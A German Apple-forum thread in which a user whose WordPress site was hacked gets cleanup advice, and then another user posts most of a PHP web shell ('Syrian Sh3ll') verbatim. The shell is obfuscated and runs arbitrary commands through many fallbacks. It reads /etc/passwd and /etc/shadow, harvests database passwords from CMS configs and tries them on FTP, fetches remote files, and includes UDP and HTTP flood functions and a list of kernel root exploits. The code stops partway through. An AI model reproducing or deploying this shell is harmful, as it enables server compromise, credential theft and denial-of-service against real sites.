• Apfeltalk ändert einen Teil seiner Allgemeinen Geschäftsbedingungen (AGB), das Löschen von Useraccounts betreffend.
    Näheres könnt Ihr hier nachlesen: AGB-Änderung
  • Viele hassen ihn, manche schwören auf ihn, wir aber möchten unbedingt sehen, welche Bilder Ihr vor Eurem geistigen Auge bzw. vor der Linse Eures iPhone oder iPad sehen könnt, wenn Ihr dieses Wort hört oder lest. Macht mit und beteiligt Euch an unserem Frühjahrsputz ---> Klick

PHP-Skript - seltsame email!

drlecter

Wöbers Rambur
Registriert
04.11.06
Beiträge
6.442
Das was du als css.php gepostet hast (bevor du das wieder entfernt hast) sah man das hat. Es ist ein WP Hack. Hier hast du was für die schnelle zum nachlesen KLICK
Meine Frage bezog sich darauf, was du genau bei Goneo (sorry ich kenne den Anbieter nicht) für einen Vertrag hast. Ob z.B. die das System immer aktuell halten (sprich php usw.) oder ob du dich selber drum kümmern musst.
Bei WP musst du dich wohl selber darum kümmern, da es halt Content ist.

Mein Tipp: Wenn du die Artikel sichern kannst (und auch willst) sichern.
Danach die DB löschen und auch die DB Passwörter ändern.
WP einmal neu installieren und dann immer aktuallisieren (das geh über das Admininterface von WP recht einfach).
 

bergheimer

Roter Delicious
Registriert
03.12.10
Beiträge
91
Code:
<?php
#  ____ _ _    __ _ _ _ _  _      __      _ _    _             
# /_ _ _|\ \  / /| |____ \| |    /  \    | |\ \  ||             
# (_ _    \ \/ / | |____||| |   / /\ \   | | \ \ ||                      
# \_ _ \   \  |  | |____/ | |  / /--\ \  | |  \ \||              
# __ _) |  |  |  | |  \ \ | | / /----\ \ | |   \ \|          
#|_ _ _/   |__|  |_|   \_\|_|/_/      \_\|_|    \_|    
#  _ _ _ _          _ _
# /_ _ _| |        | | |   [ ~~Syrian Sh3ll~~ ] is a php evil script , please use it against ISRAEL Only .  
# (___  | |__   ___| | |   Coded By :  EH << SyRiAn | 34G13  <~> sy34[at]msn[dot]com
# \___ \|  _ \ / _ \ | |   Note : I'm Proud to be ~~SyRiAn~~
# __ _)|| | | || __/ | |   Copyright (C) 2010 - ~~ syrian-shell.com ~~
#|_ _ _/|_| |_|\___|_|_|   Thanx : [ Allah ] [ HaniWT ] [ SyRiAn_SnIpEr ] [ SyRiAn_SpIdEr ] [ TNT Hacker ] .
#
## leak3d by ~> chippy1337.. k0mpl1m3nts [ TFL ], [ XiX ], [ LuSiD ], [ hysterix ]
 
 
$iOll100oil0ioIlo = 1;  
$user = 'chippy';  
$pass = 'loldongs';  
$iIi1i11l11OoIlIl = '#990000';  
 if($_GET['id']== 'logout') {Logout();} if(!($_GET['id'] == 'sshSession')) {echo CSS($iIi1i11l11OoIlIl);}  
 
 
else if($_GET['id'] == 100){echo "<\142\x6f\144\171 \157n\154o\x61\144='Suicide();'>";} else if($_GET['id'] == 'Delete'){Suicide();}  
 
 
function iI11i0Il0iO0iooi($file,$per) { if(function_exists('chmod')){$try = chmod($file,$per); } if(!$try){$try = Exe("\143h\x6do\144 $per $file"); } if($try){return true;} else{return false;} } function showUsers() { if($rows = Exe('cat /etc/passwd')){echo $rows;} elseif($rows= Exe('cat /etc/domainalias')){echo $rows;} elseif($rows= Exe('cat /etc/shadow')){echo $rows;} elseif($rows= Exe('cat /var/mail')) {echo $rows;} elseif($rows= Exe('cat /etc/valiases')) {echo $rows;} elseif(file_exists('/etc/passwd')) { for($uid=0;$uid<60000;$uid++) { $iiOo1o0i00I0i0OO = posix_getpwuid($uid); if (!empty($iiOo1o0i00I0i0OO)) {while (list ($key, $iIio1oOolli0oI1l) = each($iiOo1o0i00I0i0OO)){print "$iIio1oOolli0oI1l:";}print "\n";} } } else { echo "[-] \103\x61n'\164 \x53h\x6fw Users :( ... \123\157\162r\171 ";} } function i1lOlOi0I01ooOoo($url) { while(1) { $i0o1iOil1oIoI0I1 = curl_init($url); curl_setopt($i0o1iOil1oIoI0I1, CURLOPT_RETURNTRANSFER, 1); $do = curl_exec($i0o1iOil1oIoI0I1); curl_close($i0o1iOil1oIoI0I1); flush(); } echo "[+] D\104\x4f\123 A\x74t\x61\143k H\141s \104\157\156\x33 ."; return true; } function iOIilO1iIolIl11l($url) { $packets = 0; ignore_user_abort(TRUE); set_time_limit(0); for($i=0;$i<65000;$i++){$i00oiiolO100I10o .= 'X'; } while(1) { $packets++; $rand = rand(1,65000); $i10Oi1lOO10I1OoI = fsockopen('udp://'.$url, $rand, $il1Oi1OoO11I1OiI, $i1Oli10olOiIlloI, 5); if($i10Oi1lOO10I1OoI){fwrite($i10Oi1lOO10I1OoI, $i00oiiolO100I10o); fclose($i10Oi1lOO10I1OoI);} } echo "\125\x44\x50 \106l\157\157\144 : Com\x70\x6ce\x74e\144 \x77it\x68 $packets (" . round(($packets*65)/1024, 2) . " M\x42) packets a\166\x65r\x61gin\x67\n"; } function iiIolll1o11oIOll($os) { if($os == "\114\151\156\x75\170"){$iiIolll1o11oIOll = Exe('ls -lia');} else if ($os == "Windows"){$iiIolll1o11oIOll = Exe('dir');} if($iiIolll1o11oIOll){echo $iiIolll1o11oIOll;} else if(function_exists('opendir')) { if ($i10Ol0oo0Oo1Ii0I = opendir(getcwd())) { while (false !== ($file = readdir($i10Ol0oo0Oo1Ii0I))){echo "$file\n";} while ($file = readdir($i10Ol0oo0Oo1Ii0I)){echo "$file\n";} closedir($i10Ol0oo0Oo1Ii0I); } } else { $d=dir(getcwd()); if ($d) { while (false!==($file=$d->read())) { if ($file=="." || $file=="..") continue; clearstatcache(); list ($il1Ii0l0oilIoO1i, $i1oo1oi0oilOIiO1, $iO0Ol010oll1IolI, $ioOi11OO101OIiOo, $uid, $iO10i11lli0Iol1o, $iOi11OlOloo0I0ol, $size, $il0l1OoliOI0101l, $iI1oi10ooOiiIi1O, $i10ol11il0Ilii11, $il10i0iO0lIOiilO) = stat($file); if($windows) {echo date("d.\x6d.\131 H:i",$iI1oi10ooOiiIi1O);if(is_dir($file)) echo "  <\x44\x49\x52> "; else printf("% 7s ",$size);} else { $owner = posix_getpwuid($uid); $iOo0111l1llIloOI = posix_getgrgid($iO10i11lli0Iol1o); echo $i1oo1oi0oilOIiO1." "; echo perms(fileperms($file)); printf("% 4d % 9s % 9s %7s ",$ioOi11OO101OIiOo,$owner['name'],$iOo0111l1llIloOI['name'],$size); echo date("d.\155.\131 H:i ",$iI1oi10ooOiiIi1O); }echo "$file\n"; }$d->close(); } } } function iloOl1lloloI1loI($fileURL) { $i10010oOiOOllIi0 = Exe('get '.$fileURL); if(!$i10010oOiOOllIi0){$i0iliOooiOOolIio = Exe('wget '.$fileURL);} elseif(!$i0iliOooiOOolIio){$iOol10O0lo0loII1 = Exe('curl -o '.$fileURL);} elseif(!$iOol10O0lo0loII1){$iO0lloO0l01OOI11 = Exe('lynx -source '.$fileURL);} if(!$iO0lloO0l01OOI11 && function_exists('file_get_contents') && function_exists('fwrite')) { $ioil11lioiiIO001 = file_get_contents($fileURL); iii0li0iIOii1III('newRemoteFile',$ioil11lioiiIO001);
} } function iioiio0iiI0loioo($file) { $il01l10iOoliIioO = fopen($file,'r');  
if(function_exists('fread')){echo fread($il01l10iOoliIioO,100000); }  
elseif(function_exists('fgets')){echo fgets($il01l10iOoliIioO);}  
elseif(function_exists('readfile')){echo readfile($il01l10iOoliIioO);}  
elseif(function_exists('file_get_contents')) {$ilIIl11oiOllIol1 = file_get_contents($file, NULL, NULL, 0, 1000000);var_dump($ilIIl11oiOllIol1);}  
else if(!is_dir(dirname(__FILE__)."/\150t\x74\x70:"))  
{ if(!is_writable(dirname(__FILE__))) echo "\x49 c\141n'\164 \x63\162\x65\141\164e \150\164\164p:directory"; else { mkdir("\x68\164t\160:"); if(get_magic_quotes_gpc() == 1){$file = stripslashes($_POST['file']);} else{$file=$_POST['file'];} if((curl_exec(curl_init("\146\151\x6ce:ht\164p://../".htmlspecialchars_decode($file)))) and !empty($file)) die(); elseif(!empty($file)) die("\x53\x6frry... \x46\151\x6ce ".htmlspecialchars($file)." d\x6fe\x73\x6e'\x74 \145\170i\163ts \x6fr \171\x6f\x75 \x64\x6f\156'\x74 h\141v\145 \x70e\162\x6d\151\x73si\x6f\x6es."); } } elseif(function_exists('file'))  
{ $ilIIl11oiOllIol1 = file($file); foreach ($ilIIl11oiOllIol1 as $io1olo1i0loOI0O0 => $iioi1li0110oIl10) { echo $iioi1li0110oIl10 . "
"; } } elseif(function_exists('copy'))  
{ $tmp=tempnam('','cx'); copy('compress.zlib://'.$file,$tmp); $iii01iollOOIoo0l=fopen($tmp,'r'); $data=fread($iii01iollOOIoo0l,filesize($tmp)); fclose($iii01iollOOIoo0l); echo $data; } elseif(function_exists('mb_send_mail'))  
{ if(file_exists('/tmp/mb_send_mail')){DeleteFile('/tmp/mb_send_mail');} mb_send_mail(NULL, NULL, NULL, NULL,'-C $file -X /tmp/mb_send_mail'); readfile('/tmp/mb_send_mail'); } else if(function_exists('curl_init'))  
{ $i0o1iOil1oIoI0I1 = curl_init("\146i\x6c\145://".$file."\x00".__FILE__); var_dump(curl_exec($i0o1iOil1oIoI0I1)); } else if(is_object($il1ii0olO010oIll=new COM('WScript.shell'))){echo $exec=i1OO11Ol00IOo0l1("type '$file'",$il1ii0olO010oIll);}  
else if(i11Ii10o0oIli1I1('win_shell_execute')){echo i0lI1o0loo0ooI1i("type '$file'");}  
else if(i11Ii10o0oIli1I1('win32_create_service')){echo i0iliil1ii1iIOlo("type '$file'");}  
else if(function_exists('imap_open') && ($file == '/etc/passwd'))  
{ $i00O1OOOo000OIiI=imap_open('/etc/passwd','',''); $list=imap_list($i00O1OOOo000OIiI,$file,'*'); for($i=0;$i<count($list);$i++){echo $list[$i]."\n";} imap_close($i00O1OOOo000OIiI); $i00O1OOOo000OIiI=imap_open($file,'',''); $tmp=imap_body($i00O1OOOo000OIiI,1); echo $tmp; imap_close($i00O1OOOo000OIiI); } elseif(function_exists('tempnam'))  
{ $iiOl1OOo1O1loIo1="./"; $temp=tempnam($iiOl1OOo1O1loIo1, "cx"); if(copy("\143o\x6dp\x72es\x73.\172\154\151\142://".$file, $temp)) { $iilIioO1001liIol = fopen($temp, "r"); $illo100ooi0OlIl1 = fread($iilIioO1001liIol, filesize($temp)); fclose($iilIioO1001liIol); echo htmlspecialchars($illo100ooi0OlIl1); DeleteFile($temp); } else {echo htmlspecialchars($file)."\144\x6f\163\145n'\164 \x65\x78\151st\163 \x6f\162 \x79\x6f\x75 \x64o\x6e't \150\141\166\145 \141\x63\143\145s\163.";} } elseif(substr(phpversion(),0,1) <'5'){echo "\x50l\x65a\163\145 \107\145\x6e\145r\x61\x74\x65 \x69ni.\x70\150\x70 \146\x69\x6c\145 \141nd \165se ?cmd=command";} elseif(Exe('cat '.$file.'')){echo Exe('cat '.$file.''); } elseif(function_exists('include')){include($file); } fclose($il01l10iOoliIioO); } function iIO0io1IO0OI1lii($host,$user,$pass,$db) { $connect = mysql_pconnect($host,$user,$pass); if(!$connect){echo "C\141\x6e'\x74 \x43\157\x6en\145\143t to [ ".$host." ] [ ".$user." ] [ ".$pass." ]"; return false; } else { $ioIOl0OOlO0O0IIO = mysql_select_db($db,$connect); if(!$ioIOl0OOlO0O0IIO){echo "\103an'\164 \x45nt\x65\x72 \x54h\x65 \x44at\141\x62\141\x73\145 [ ".$db." ]"; return false; } else{return true; return $connect;} } } function iOiIliO1iIoii1il($file) { $iIOiiiOlO1IOliO0=glob("$file*"); foreach ($iIOiiiOlO1IOliO0 as $v){echo "$v\n";} if(function_exists('imap_open')) { $i00O1OOOo000OIiI=imap_open('/etc/passwd','',''); $s=explode("|",$file); if(count($s)>1){$list=imap_list($i00O1OOOo000OIiI,trim($s[0]),trim($s[1]));} else {$list=imap_list($i00O1OOOo000OIiI,trim($i00O1OOOo000OIiI[0]),'*');} for($i=0;$i<count($list);$i++){imap_close($i00O1OOOo000OIiI);} } else if(is_object($il1ii0olO010oIll=new COM('WScript.shell'))) { $exec=i1OO11Ol00IOo0l1("\144\x69\x72 '$file'",$il1ii0olO010oIll); $exec=str_replace("\t",'',$exec); echo $exec; } else if(i11Ii10o0oIli1I1('win_shell_execute')){echo i0lI1o0loo0ooI1i("dir '$file'");} else if(i11Ii10o0oIli1I1('win32_create_service')){echo i0iliil1ii1iIOlo("d\x69r '$file'");} } function iIll1ll1iOoIoloo($domainToHack) { $iioIiOli00iI0Ilo = Exe("ls -\x6c\141 /\145\164\143/\x76\141\154\151\x61\163e\163/$domainToHack"); $iIO0l1i0OiIloO1I =0 ; for($i=0;$i<strlen($iioIiOli00iI0Ilo);$i++) { if($iIO0l1i0OiIloO1I >= 4){break;} if($iioIiOli00iI0Ilo[$i] == ' '){$iIO0l1i0OiIloO1I++;} if($iIO0l1i0OiIloO1I == 3){if($iioIiOli00iI0Ilo[$i] == " "){}else {$iioIi0ilOloII01o .= $iioIiOli00iI0Ilo[$i];}} }return $iioIi0ilOloII01o; } function i0olili01oiIl1Io($login,$pass) { $ftp=ftp_connect('127.0.0.1'); if ($ftp) { $i0IoililO0ooIl01=ftp_login($ftp,$login,$pass); if ($i0IoililO0ooIl01) { echo '[FTP] '.$login.':'.$pass."  S\165\x63\143e\163\x73\n"; } else ftp_quit($ftp); } } function il0oll1olll0Io1l($path,$username) { if ($i10Ol0oo0Oo1Ii0I = opendir($path)) { while (false !== ($file = readdir($i10Ol0oo0Oo1Ii0I))) { $i1II1llooliIIi00="$path$file"; if (($file!='.') and ($file!='..')) { if (is_readable($i1II1llooliIIi00)) { $i0lll0l11OoI0IOl="$i1II1llooliIIi00/"; if (is_dir($i0lll0l11OoI0IOl)) { il0oll1olll0Io1l($i0lll0l11OoI0IOl,$username); } else { if (($file=='config.php') or ($file=='config.inc.php') or ($file=='db.inc.php') or ($file=='connect.php') or ($file=='wp-config.php') or ($file=='var.php') or ($file=='configure.php') or ($file=='db.php') or ($file=='db_connect.php')) { $pass=i111l1lliOlIOoIo($i1II1llooliIIi00); if ($pass!='') { echo "[+] $i1II1llooliIIi00\n$pass\n"; i0olili01oiIl1Io($username,$pass); } } } }
} } } } function i111l1lliOlIOoIo($link) { $config=fopen($link,'r'); while(!feof($config)) { $line=fgets($config); if (strstr($line,'pass') or strstr($line,'password') or strstr($line,'passwd')) { if (strrpos($line,'"')) $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,'"')-(strpos($line,'=')+3))); else $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,"'")-(strpos($line,'=')+3))); return $pass; } } } function ill0iiioI0III0I0() { if (getenv(HTTP_X_FORWARDED_FOR)){$ip=getenv(HTTP_X_FORWARDED_FOR);} elseif (getenv(HTTP_CLIENT_IP)){$ip=getenv(HTTP_CLIENT_IP);} else {$ip=getenv(REMOTE_ADDR);} return $ip; } function i0oO11oioOiOIiil() { $i0oO11oioOiOIiil = ini_get("\x6fp\x65n_\142as\x65\x64\x69\x72"); if (!$i0oO11oioOiOIiil){$i0oO11oioOiOIiil = '<font color="green">OFF</font>';} else {$i0oO11oioOiOIiil = '<font color="red">ON</font>';} return $i0oO11oioOiOIiil; } function iIl1l0O0ooOO1IOI($string) { $hex=''; for ($i=0; $i < strlen($string); $i++){$hex .= dechex(ord($string[$i]));}return $hex; } function SafeMode() { $safe_mode = ini_get("safe_mode"); if (!$safe_mode){$safe_mode = '<font color="green">OFF</font>';} else {$safe_mode = '<font color="red">ON</font>';} return $safe_mode; } function i01oiOo00oiIl1Io() { $i01oiOo00oiIl1Io = $_SERVER["\x53\x43\x52IP\124_\116\x41M\x45"]; $i01oiOo00oiIl1Io = Explode('/', $i01oiOo00oiIl1Io); $i01oiOo00oiIl1Io = $i01oiOo00oiIl1Io[count($i01oiOo00oiIl1Io) - 1]; return $i01oiOo00oiIl1Io; } function Suicide() {DeleteFile(i01oiOo00oiIl1Io());} function iIoii11ioiOOIoI1() { $v=php_uname(); $db=array('2.6.17'=>'prctl3, raptor_prctl, py2','2.6.16'=>'raptor_prctl, exp.sh, raptor, raptor2, h00lyshit','2.6.15'=>'py2, exp.sh, raptor, raptor2, h00lyshit','2.6.14'=>'raptor, raptor2, h00lyshit','2.6.13'=>'kdump, local26, py2, raptor_prctl, exp.sh, prctl3, h00lyshit','2.6.12'=>'h00lyshit','2.6.11'=>'krad3, krad, h00lyshit','2.6.10'=>'h00lyshit, stackgrow2, uselib24, exp.sh, krad, krad2','2.6.9'=>'exp.sh, krad3, py2, prctl3, h00lyshit','2.6.8'=>'h00lyshit, krad, krad2','2.6.7'=>'h00lyshit, krad, krad2','2.6.6'=>'h00lyshit, krad, krad2','2.6.2'=>'h00lyshit, krad, mremap_pte','2.6.'=>'prctl, kmdx, newsmp, pwned, ptrace_kmod, ong_bak','2.4.29'=>'elflbl, expand_stack, stackgrow2, uselib24, smpracer','2.4.27'=>'elfdump, uselib24','2.4.25'=>'uselib24','2.4.24'=>'mremap_pte, loko, uselib24','2.4.23'=>'mremap_pte, loko, uselib24','2.4.22'=>'loginx, brk, km2, loko, ptrace, uselib24, brk2, ptrace-kmod','2.4.21'=>'w00t, brk, uselib24, loginx, brk2, ptrace-kmod','2.4.20'=>'mremap_pte, w00t, brk, ave, uselib24, loginx, ptrace-kmod, ptrace, kmod','2.4.19'=>'newlocal, w00t, ave, uselib24, loginx, kmod','2.4.18'=>'km2, w00t, uselib24, loginx, kmod','2.4.17'=>'newlocal, w00t, uselib24, loginx, kmod','2.4.16'=>'w00t, uselib24, loginx','2.4.10'=>'w00t, brk, uselib24, loginx','2.4.9'=>'ptrace24, uselib24','2.4.'=>'kmdx, remap, pwned, ptrace_kmod, ong_bak','2.2.25'=>'mremap_pte','2.2.24'=>'ptrace','2.2.'=>'rip, ptrace'); foreach($db as $iI1oio1lOoo0I1oI=>$x)if(strstr($v,$iI1oio1lOoo0I1oI))return $x; if(!$iiiiiOOi0ololIOI)$iiiiiOOi0ololIOI='<font color="red">Not found.</font>'; return $iiiiiOOi0ololIOI; } function PostgreSQL() { if(function_exists('pg_connect')){$postgreSQL = '<font color="red">ON</font>';} else {$postgreSQL = '<font color="green">OFF</font>';}return $postgreSQL; } function Oracle() { if(function_exists('ocilogon')){$oracle = '<font color="red">ON</font>';} else {$oracle = '<font color="green">OFF</font>';}return $oracle; } function i1ol1ilOlIoIOOII($url, $hacker, $hackmode,$i0OIlil10ooiI0Io, $site ) { $iI1oio1lOoo0I1oI = curl_init(); curl_setopt($iI1oio1lOoo0I1oI, CURLOPT_URL, $url); curl_setopt($iI1oio1lOoo0I1oI,CURLOPT_POST,true); curl_setopt($iI1oio1lOoo0I1oI, CURLOPT_POSTFIELDS,"d\x65f\x61c\145r=".$hacker."&do\155ai\1561=". $site."&hackmode=".$hackmode."&\x72\145\141\x73o\156=".$i0OIlil10ooiI0Io); curl_setopt($iI1oio1lOoo0I1oI,CURLOPT_FOLLOWLOCATION, true); curl_setopt($iI1oio1lOoo0I1oI, CURLOPT_RETURNTRANSFER, true); $ilIOioilO0O1IO1i = curl_exec($iI1oio1lOoo0I1oI); curl_close($iI1oio1lOoo0I1oI);return $ilIOioilO0O1IO1i; } function MsSQL() { if(function_exists('mssql_connect')){$msSQL = '<font color="red">ON</font>';} else {$msSQL = '<font color="green">OFF</font>';}return $msSQL; } function il0iiOOoiIOOioil() { $ioIIiioOOl1lIi1I = function_exists('mysql_connect'); if($ioIIiioOOl1lIi1I){$mysql = '<font color="red">ON</font>';} else {$mysql = '<font color="green">OFF</font>';}return $mysql; } function iilI11l1o01IilIo($ScriptType) {
if($ScriptType == 'vb'){return "/\x69\156c\x6c\165\x64\145\x73/config.\x70\x68\x70";} elseif($ScriptType == 'wp'){return "/\167\160-config.\160\150p";} elseif($ScriptType == 'phpbb'){return "/config.p\x68p";} elseif($ScriptType == 'jos'){return "/\x63\157\156\x66\x69\x67\x75\x72a\x74i\x6fn.\160\150\x70";} elseif($ScriptType == 'ipb'){return "/\143o\x6e\146_\x67\154\x6f\x62\x61\154.p\150\x70";} elseif($ScriptType == 'smf'){return "/\123\145\x74\164\151\156\147s.\x70\x68\160 ";} elseif($ScriptType == 'mybb'){return "/\x69\156\143/config.\x70\150\x70 ";} } function Gzip() { if (function_exists('gzencode')){$gzip = '<font color="red">ON</font>';} else {$gzip = '<font color="green">OFF</font>';}return $gzip; } function MysqlI() { if (function_exists('mysqli_connect')){$mysqli = '<font color="red">ON</font>';} else {$mysqli = '<font color="green">OFF</font>';}return $mysqli; } function MSQL() { if (function_exists('msql_connect')){$mSql = '<font color="red">ON</font>';} else {$mSql = '<font color="green">OFF</font>';}return $mSql; } function iiIi1OiO1IlIOIi1() { if (function_exists('sqlite_open')){$iiIi1OiO1IlIOIi1 = '<font color="red">ON</font>';} else {$iiIi1OiO1IlIOIi1 = '<font color="green">OFF</font>';}return $iiIi1OiO1IlIOIi1; } function iilolol00IilOo1I() { if(ini_get('register_globals')){$iO0Oilioli1iI1Ii= '<font color="red">ON</font>';} else{$iO0Oilioli1iI1Ii= '<font color="green">OFF</font>';}return $iO0Oilioli1iI1Ii; } function i1iI1iliIoI0oOOi($size) { if($size >= 1073741824) {$size = round($size / 1073741824 * 100) / 100 . " \x47\x42";} elseif($size >= 1048576) {$size = round($size / 1048576 * 100) / 100 . " M\102";} elseif($size >= 1024) {$size = round($size / 1024 * 100) / 100 . " \113\x42";} else {$size = $size . " B";}return $size; } function Curl() { if(extension_loaded('curl')){$curl = '<font color="red">ON</font>';} else{$curl = '<font color="green">OFF</font>';}return $curl; } function iioO1iiiOOoIi1l0($scriptType) { if(file_exists('DecryptConfig.php')) { include("\x44\145c\x72\x79\x70\164\x43\x6fn\146\151\147.\160\x68p"); if($scriptType == 'vb') { $dbName = $config['Database']['dbname']; $prefix = $config['Database']['tableprefix']; $email = $config['Database']['technicalemail']; $host = $config['MasterServer']['servername']; $port = $config['MasterServer']['port']; $user = $config['MasterServer']['username']; $pass = $config['MasterServer']['password']; $admincp = $config['Misc']['admincpdir']; $iO0olioOo0O0I1IO = $config['Misc']['modcpdir']; } elseif($scriptType == 'wp') { $dbName = DB_NAME; $prefix = $table_prefix; $host = DB_HOST; $user = DB_USER; $pass = DB_PASS; } elseif($scriptType == 'jos') { $dbName = $db; $prefix = $ioOlioolio0IIoOo; $email = $i10olOl1io10IOll; $host = $host; $user = $user; $pass = $password; } elseif($scriptType == 'phpbb') { $host = $ioill00lo0lI1l1o; $port = $i1o1lOOi0liIllIo; $dbName = $dbname; $user = $ioO0i0O11OlIOlO1; $pass = $ioioiO0lo1OI1iiO; $prefix = $table_prefix; } elseif($scriptType == 'ipb') { $host = $INFO['sql_host']; $dbName = $INFO['sql_database']; $user = $INFO['sql_user']; $pass = $INFO['sql_pass']; $prefix = $INFO['sql_tbl_prefix']; }
elseif($scriptType == 'smf') { $dbName = $db_name; $pass = $iol1iO0Oli0IlOI1; $prefix = $iOool0o011iI0OIO; $host = $iOI1l0oiO0OI0l0o; $user = $db_user; $email = $iiool000ii1lOIli; } elseif($scriptType == 'mybb') { $host = $config['database']['hostname']; $user = $config['database']['username']; $pass = $config['database']['password']; $dbName = $config['database']['database']; $prefix = $config['database']['table_prefix']; $admincp = $config['admin_dir']; $prefix = $config['database']['table_prefix']; } echo '
#-------------------------------#
#      Config Informations      #
#-------------------------------#
Host : '.$host.'
DB Name : '.$dbName.'
DB User : '.$user.'
DB Pass : '.$pass.'
Prefix : '.$prefix.'
Email : '.$email.'
Port : '.$port.'
ACP : '.$admincp.'
MCP : '.$iO0olioOo0O0I1IO.'
'; } else{echo "F\x69l\x65 De\143\x72y\160t\103o\x6e\146i\147.ph\x70 \116\157t \x45\x78\151s\x74\x73 !! ";} } function ilI1iii00OiI00I1() { echo '<table bgcolor="#cccccc" width="100%"><tr>
    <td width="100%">[<sy><a href="#top">TOP</a></sy>]
    <center><font color="gray" size="-2"><b>
    <font color="gray">C0D3D By</font><sy>&nbsp; ~~ [ </sy>
    <font color="gray">EH SyRiAn_34G13</font><sy> ] ~~ [
    </sy><font color="gray">[email protected]</font><sy> ]
    ~~ [
    </sy><font color="gray">www.syrian-shell.com</font><sy> ]
    </sy></b>
    </td>
    </tr></table>
    </tbody>
    <a name="down"></a>
    </body></html>
    '; } function iOIllOOoi1li1IOi() { $i1l0i000ll0o1I1O=ini_get('upload_tmp_dir'); $iO1llOo01oll1IO0=getenv('USERPROFILE'); $io1o1o0ol0IO0011=getenv('ALLUSERSPROFILE'); $i10Oliii0liiI0Io=ini_get('session.save_path'); $ioil1i0O00lIOoI1=(getenv('TMP'))?getenv('TMP'):getenv('TEMP'); if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp'; if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp'; if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp'; if(is_dir($iO1llOo01oll1IO0) && is_writable($iO1llOo01oll1IO0))return $iO1llOo01oll1IO0; if(is_dir($io1o1o0ol0IO0011) && is_writable($io1o1o0ol0IO0011))return $io1o1o0ol0IO0011; if(is_dir($i10Oliii0liiI0Io) && is_writable($i10Oliii0liiI0Io))return $i10Oliii0liiI0Io; if(is_dir($i1l0i000ll0o1I1O) && is_writable($i1l0i000ll0o1I1O))return $i1l0i000ll0o1I1O; if(is_dir($ioil1i0O00lIOoI1) && is_writable($ioil1i0O00lIOoI1))return $ioil1i0O00lIOoI1; return '.'; } function i0lI1o0loo0ooI1i($command) { $name=iOIllOOoi1li1IOi()."\\".uniqid('NJ'); win_shell_execute('cmd.exe','',"/C $command >\"$name\""); sleep(1); $exec=file_get_contents($name); DeleteFile($name); return $exec; } function update() {echo "[+] U\x70\x64\141\x74\145 \x48a\163 \104\x30\156\x33 ^_^";} function i0iliil1ii1iIOlo($command) { $name=iOIllOOoi1li1IOi()."\\".uniqid('NJ'); $n=uniqid('NJ'); $cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec']; win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/\143 $command >\"$name\"")); win32_start_service($n); win32_stop_service($n); win32_delete_service($n); while(!file_exists($name))sleep(1); $exec=file_get_contents($name); DeleteFile($name); return $exec; } function iIlol10lO11Ii0Ol($command) { $name=iOIllOOoi1li1IOi()."\\".uniqid('NJ'); $iIl0loOO1lIoi00o=new ffi("[\154\x69b='ke\x72\x6e\x65\x6c\x33\062.\144ll'] i\156\164 WinExec(c\150a\162 *A\120P,\x69\x6et \x53\x57);"); $i0IoililO0ooIl01=$iIl0loOO1lIoi00o->WinExec("cmd.\x65\x78\x65 /\143 $command >\"$name\"",0); while(!file_exists($name))sleep(1); $exec=file_get_contents($name); DeleteFile($name); return $exec; } function i1OO11Ol00IOo0l1($command,$il1ii0olO010oIll) { $exec=$il1ii0olO010oIll->exec("cmd.\145x\145 /\143 $command"); $so=$exec->StdOut(); return $so->io00iOOlOI0ollI1(); } function iO0Illo1lO0lIoIl($command) { $perl=new perl(); ob_start(); $perl->eval("s\171s\164\x65m('".$command."')"); $exec=ob_get_contents(); ob_end_clean(); return $exec; } function Exe($command) { global $windows; $exec=$output=''; $iiOl10io00iI1o0i[]=array('pipe','r');$iiOl10io00iI1o0i[]=array('pipe','w'); if(function_exists('passthru')){ob_start();passthru($command);$exec=ob_get_contents();ob_clean();ob_end_clean();}
elseif(function_exists('system')){$tmp=ob_get_contents();ob_clean();system($command);$output=ob_get_contents();ob_clean();$exec=$tmp;} elseif(function_exists('exec')){exec($command,$output);$output=join("\n",$output);$exec=$output;} elseif(function_exists('shell_exec'))$exec=shell_exec($command); elseif(function_exists('popen')){$i10Oi1lOO10I1OoI = popen($command,"\x72"); {$result = "";while(!feof($i10Oi1lOO10I1OoI)){$result.=fread($i10Oi1lOO10I1OoI,1024);}pclose($i10Oi1lOO10I1OoI);} $exec = convert_cyr_string($result,"d","\x77");} elseif(function_exists('proc_open')){$i0IoililO0ooIl01=proc_open($command,$iiOl10io00iI1o0i,$ilOIi1011iloIl1I);while(!feof($ilOIi1011iloIl1I[1])){$line=fgets($ilOIi1011iloIl1I[1]);$output.=$line;}$exec=$output;proc_close($i0IoililO0ooIl01);} elseif(function_exists('win_shell_execute'))$exec=i0lI1o0loo0ooI1i($command); elseif(function_exists('win32_create_service'))$exec=i0iliil1ii1iIOlo($command); elseif(extension_loaded('ffi') && $windows)$exec=iIlol10lO11Ii0Ol($command); elseif(extension_loaded('perl'))$exec=iO0Illo1lO0lIoIl($command); return $exec; } function illolO1llo0iIi1l() { if(function_exists('get_magic_quotes_gpc')){$iOillO11lOO0I1I0 = get_magic_quotes_gpc();} if (empty($iOillO11lOO0I1I0)){$iOillO11lOO0I1I0 = '<font color="green">OFF</font>';} else {$iOillO11lOO0I1I0= '<font color="red">ON</font>';}return $iOillO11lOO0I1I0; } function DisableFunctions() { $ioli1OloillI0iOi = ini_get('disable_functions'); if (empty($ioli1OloillI0iOi)){$ioli1OloillI0iOi = '<font color="green">NONE</font>';}return $ioli1OloillI0iOi; } function i0IilOl1iIl0llOi($os) { if($os == 'Windows') { echo "
        <se\x6c\145\143t name=alias >
        <option value=''>\x4e\x4f\116\x45</option>    
        <option value='d\151\x72' >\x4c\x69\x73t \x44ire\x63\164or\x79</option>
        <option value='d\151\x72 /s /w /\142 index.ph\x70'>F\x69\156\x64 index.\x70h\160 \x69n \143\x75\x72\162\145\156t \144\151r</option>
